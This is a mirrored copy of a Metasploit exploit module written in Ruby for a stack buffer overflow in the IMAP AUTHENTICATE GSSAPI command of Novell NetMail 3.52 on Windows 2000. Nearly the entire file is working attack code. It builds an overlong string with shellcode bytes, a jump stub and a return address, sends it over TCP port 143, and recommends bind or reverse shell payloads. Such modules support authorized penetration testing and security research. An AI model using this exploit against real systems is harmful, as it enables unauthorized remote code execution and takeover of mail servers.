Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/novell_netmail_auth.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE

18
          GSSAPI command. By sending an overly long string, an attacker can overwrite the

19
          buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp

20
          or windows/shell_reverse_tcp allows for the most reliable results.

21
        },

22
        'Author' => [ 'MC' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'OSVDB', '55175' ]

26
        ],

27
        'Privileged' => true,

28
        'DefaultOptions' => {

29
          'EXITFUNC' => 'thread',

30
          'AllowWin32SEH' => true

31
        },

32
        'Payload' => {

33
          'Space' => 850,

34
          'BadChars' => "\x00\x20\x2c\x3a\x40",

35
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",

36
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],

41
        ],

42
        'DisclosureDate' => '2007-01-07',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options([ Opt::RPORT(143) ])

53
  end

54


55
  def exploit

56
    connect

57
    sock.get_once

58


59
    jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"

60
    jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"

61
    jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

62


63
    sploit = "A001 AUTHENTICATE GSSAPI\r\n"

64
    sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"

65
    sploit << rand_text_alpha_upper(2) + [target.ret].pack('V')

66
    sploit << make_nops(8) + jmp + rand_text_alpha_upper(700)

67


68
    print_status("Trying target #{target.name}...")

69
    sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")

70


71
    handler

72
    disconnect

73
  end

74
end

75


76